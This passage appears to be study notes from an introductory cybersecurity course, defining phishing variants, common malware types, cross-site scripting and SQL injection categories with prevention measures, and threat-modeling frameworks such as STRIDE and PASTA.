frequently visited by a specific group of users. Oftentimes, these watering hole sites
are infected with malicious software. An example is the Holy Water attack of 2020
that infected various religious, charity, and volunteer websites.

Phishing for information

Phishing is the use of digital communications to trick people into revealing sensitive data or
deploying malicious software. Phishing leverages many communication technologies, but the
term is mainly used to describe attacks that arrive by email

Attackers who carry out these attacks commonly use phishing kits. A phishing kit is a collection
of software tools needed to launch a phishing campaign. People with little technical background
can use one of these kits.
Each of the tools inside are designed to avoid detection.

 The first is malicious attachments. These are files that are infected and can cause harm
to the organization's systems

 Phishing kits also include fake-data collection forms. These forms look like legitimate
forms, like a survey.

 The third resource they include are fraudulent web links.

Smishing is the use of text messages to obtain sensitive information or to impersonate a known
source.

Vishing is the exploitation of electronic voice communication to obtain sensitive information or

impersonate a known source.

Most organizations use a few basic security measures to prevent these and any other types of
phishing attacks from becoming a problem. anti-phishing policies spread awareness
and encourage users to follow data security procedures correctly. Employee training resources
also help inform employees about things to look for when an email looks suspicious
Another line of defense against phishing is securing email inboxes. Organizations also useintrusion
prevention systems to look for unusual patterns in email traffic.

Recent trends
A type of targeted phishing that evolved in the 2010s is angler phishing. Angler phishing is a
technique where attackers impersonate customer service representatives on social media. This
tactic evolved from people’s tendency to complain about businesses online.

Malicious software (Malware)

Five of the most common types of malware are a virus,
worm, trojan, ransomware, and spyware

Virus
A virus is malicious code written to interfere with computer operations and cause damage to data
and software. Viruses typically hide inside of trusted applications. When the infected program is
launched, the virus clones itself and spreads to other files on the device. An important
characteristic of viruses is that they have to be activated by the user to start the infection.

Worm
A worm is malware that can duplicate and spread itself across systems on its own. While viruses
require users to perform an action like opening a file to duplicate, worms use an infected device
as a host. They scan the connected network for other devices. Worms then infect everything on
the network without requiring an action to trigger the spread.

Trojan
A trojan, or Trojan horse, is malware that looks like a legitimate file or program.
Ransomware
Attackers often use trojans to gain access and install another kind of malware called
ransomware. Ransomware is a type of malicious attack where attackers encrypt an
organization's data and demand payment to restore access. A unique feature of ransomware
attacks is that they make themselves known to their targets. Without doing this, they couldn't
collect the money they demand. Normally, they decrypt the hidden data as soon as the sum of
money is paid. Unfortunately, there's no guarantee they won't return to demand more.

Spyware
Spyware is malware that's used to gather and sell information without consent. Consent is a
keyword in this case.

Adware

Advertising-supported software, or adware, is a type of legitimate software that is sometimes

used to display digital advertisements in applications. Software developers often use adware
as a way to lower their production costs or to make their products free to the public—also
known as freeware or shareware. In these instances, developers monetize their product
through ad revenue rather than at the expense of their users.

Malicious adware falls into a sub-category of malware known as a potentially unwanted

application (PUA). A PUA is a type of unwanted software that is bundled in with legitimate
programs which might display ads, cause device slowdown, or install other software.

Scareware

Another type of PUA is scareware. This type of malware employs tactics to frighten users
into infecting their own device.

Fileless malware

Fileless malware does not need to be installed by the user because it uses legitimate
programs that are already installed to infect a computer. This type of infection resides in
memory where the malware never touches the hard drive. This is unlike the other types of
malware, which are stored within a file on disk. Instead, these stealthy infections get into the
operating system or hide within trusted applications.

Pro tip: Fileless malware is detected by performing memory analysis, which requires
experience with operating systems.

Rootkits
A rootkit is malware that provides remote, administrative access to a computer. Most
attackers use rootkits to open a backdoor to systems, allowing them to install other forms of
malware or to conduct network security attacks.

This kind of malware is often spread by a combination of two components: a dropper and a
loader. A dropper is a type of malware that comes packed with malicious code which is
delivered and installed onto a target system.

Multi-staged malware attacks, where multiple packets of malicious code are deployed, commonly
use a variation called a loader. A loader is a type of malware that downloads strains of malicious
code from an external source and installs them onto a target system. Attackers might use loaders
for different purposes, such as to set up another type of malware---a botnet.

Botnet

A botnet, short for “robot network,” is a collection of computers infected by malware that are
under the control of a single threat actor, known as the “bot-herder.” Viruses, worms, and
trojans are often used to spread the initial infection and turn the devices into a bot for the bot-
herder.

The rise of cryptojacking

Another more recent type of malware is cryptojacking. Cryptojacking is a form of malware that
installs software to illegally mine cryptocurrencies.

Crypto mining is similar to the process for mining for other resources, like gold. Mining for
something like gold involves machinery, such as trucks and bulldozers, that can dig through the
Earth. Crypto coins, on the other hand, use computers instead.

An intrusion detection system, or IDS, is an application that monitors system activity and alerts
some possible intrusions. When abnormal activity is detected like, malware mining for coins, the
IDS alerts security personnel.

Despite their usefulness, detection systems have a major drawback. New forms of malware can
remain undetected. Fortunately, there are subtle signs that indicate a device is infected with
cryptojacking software or other forms of malware.

By far the most telling sign of a cryptojacking infection is slowdown. Other signs include
increased CPU usage, sudden system crashes, and fast draining batteries. Another sign is
unusually high electricity costs related to the resource- intensive process of crypto mining.

To reduce the likelihood of experiencing a malware attack like cryptojacking. These defenses
include things like using browser extensions designed to block malware, using ad blockers,
disabling JavaScript, and staying alert on the latest trends.

Web Based Exploits

Cross-site scripting (XSS)

Phishing and other social engineering techniques are common ways for malware to be
delivered. Another way it's spread is using a broad class of threats known as web based exploits.
Web-based exploits are malicious code or behavior that's used to take advantage of coding flaws
in a web application.
Malicious hackers commonly exploit this high level of interaction using injection attacks. An
injection attack is malicious code inserted into a vulnerable application.
A common and dangerous type of injection attack that's a threat to web apps is cross-site
scripting. Cross site scripting, or XSS, is an injection attack that inserts code into a vulnerable
website or web applicationThese attacks are often delivered by exploiting the two languages
used by most websites, HTML and JavaScript.
Both can give cybercriminals access to everything that loads on the infected web page. This can
include session cookies, geolocation, and even webcams and microphones.

There are three main types of cross-site scripting attacks reflected, stored, and DOM-based.

 A reflected XSS attack is an instance where a malicious script is sent to the server and
activated during the server's response.

 In a stored XSS attack, the malicious script isn't hidden in a link that needs to be sent to
the server. Instead a stored XSS attack is an instance when malicious script is injected
directly on the server.

 Finally there's DOM-based XSS. DOM stands for Document Object Model, which is
basically the source code of a website. A DOM-based XSS attack is an instance when
malicious script exists in the web page a browser loads. Unlike reflected XSS, these
attacks don't need to be sent to the server to activate.

Exploitable gaps in databases

A SQL injection is an attack that executes unexpected queries on a database. Like cross-site
scripting, SQL injection occurs due to a lack of sanitized input.

The best way to defend against SQL injection is code that will sanitize the input. Developers can
write code to search for specific SQL characters

A prepared statement is a coding technique that executes SQL statements before passing them
on to the database. When the user's input is unknown, the best practice is to use these prepared
statements. With just a few extra lines of code, a prepared statement executes the code before
passing it on to the server. This means the code can be validated before performing the query.

Prevent injection attacks

SQL injection categories
There are three main categories of SQL injection:

 In-band

 Out-of-band

 Inferential

In-band SQL injection

In-band, or classic, SQL injection is the most common type. An in-band injection is one
that uses the same communication channel to launch the attack and gather the results.
 Out-of-band SQL injection
An out-of-band injection is one that uses a different communication channel to launch the
attack and gather the results.

Inferential SQL injection

Inferential SQL injection occurs when an attacker is unable to directly see the results of
their attack. Instead, they can interpret the results by analyzing the behavior of the
system.

Injection Prevention
There are several ways to escape user inputs:

 Prepared statements: a coding technique that executes SQL statements before

passing them on to a database

 Input sanitization: programming that removes user input which could be interpreted
as code.

 Input validation: programming that ensures user input meets a system's expectations.

Threat Modelling
Threat modeling is a process of identifying assets, their vulnerabilities, and how each is exposed
to threats.

In general, there are six steps of a threat model. A DevSecOps team, which stands for
development, security, and operations, usually performs these analyses.

A typical threat modeling process is performed in a cycle:

 Define the scope.

 Identify threats.

 Characterize the environment.

 Analyze threats.

 Mitigate risks.

 Evaluate findings.

1. The first is to define the scope of the model. At this stage, the team determines what
they're building by creating an inventory of assets and classifying them.
 2. The second step is to identify threats. After threat actors have been identified, the team
puts together what's known as an attack tree. An attack tree is a diagram that maps
threats to assets.

3. Step three of the threat modeling process is to characterize the environment. Here, the
team applies an attacker mindset to the business. They consider how the customers and
employees interact with the environment. Other factors they consider are external
partners and third party vendors.

4. At step four, their objective is to analyze threats. Here, the team works together to
examine existing protections and identify gaps. They then rank threats according to their
risk score that they assign.

5. During step five, the team decides how to mitigate risk. At this point, the group creates
their plan for defending against threats.

6. The sixth and final step is to evaluate findings. At this stage, everything that was done
during the exercise is documented, fixes are applied, and the team makes note of any
successes they had. They also record any lessons learned, so they can inform how they
approach future threat models.

Ideally, threat modeling should be performed before, during, and after an application is
developed.

Threat modeling should be incorporated at every stage of the software development lifecycle,
or SDLC.

Common frameworks

When performing threat modeling, there are multiple methods that can be used, such as:

 STRIDE

 PASTA

 Trike

 VAST

Organizations might use any one of these to gather intelligence and make decisions to
improve their security posture. Ultimately, the “right” model depends on the situation and the
types of risks an application might face.

STRIDE
STRIDE is a threat-modeling framework developed by Microsoft. It’s commonly used to
identify vulnerabilities in six specific attack vectors. The acronym represents each of these
vectors: spoofing, tampering, repudiation, information disclosure, denial of service, and
elevation of privilege.
PASTA
PASTA is a popular threat modeling framework that's used across many industries. PASTA is short for
Process for Attack Simulation and Threat Analysis. risk-centric threat modeling process developed by
two OWASP leaders and supported by a cybersecurity firm called VerSprite. There are seven stages of
the PASTA framework.

1. Stage one of the PASTA threat model framework is to define business and security
objectives.

2. Stage two of the PASTA framework is to define the technical scope.

3. At stage three of PASTA, the team's job is to decompose the application. This normally
means working with the application developers to produce a data flow diagram. A diagram
like this will show how data gets from a user's device to the company's database.

4. Stage four of PASTA is next. The focus here is to perform a threat analysis.

5. Stage five of PASTA is performing a vulnerability analysis. In this stage, the team more
deeply investigates potential vulnerabilities by considering the root of the problem.

6. Next is stage six of PASTA, where the team conducts attack modelling. This is where the
team tests the vulnerabilities that were analyzed in stage five by simulating attacks. The team
does this by creating an attack tree, which looks like a flow chart

7. Stage seven of PASTA is to analyze risk and impact. Here, the team assembles all the
information they've collected in stages one through six. By this stage, the team is in position
to make informed risk management recommendations to business stakeholders that align
with their goals.

Trike
Trike is an open source methodology and tool that takes a security-centric approach to threat
modeling. It's commonly used to focus on security permissions, application use cases,
privilege models, and other elements that support a secure environment.

VAST
The Visual, Agile, and Simple Threat (VAST) Modeling framework is part of an automated
threat-modeling platform called ThreatModeler®. Many security teams opt to use VAST as a
way of automating and streamlining their threat modeling assessments.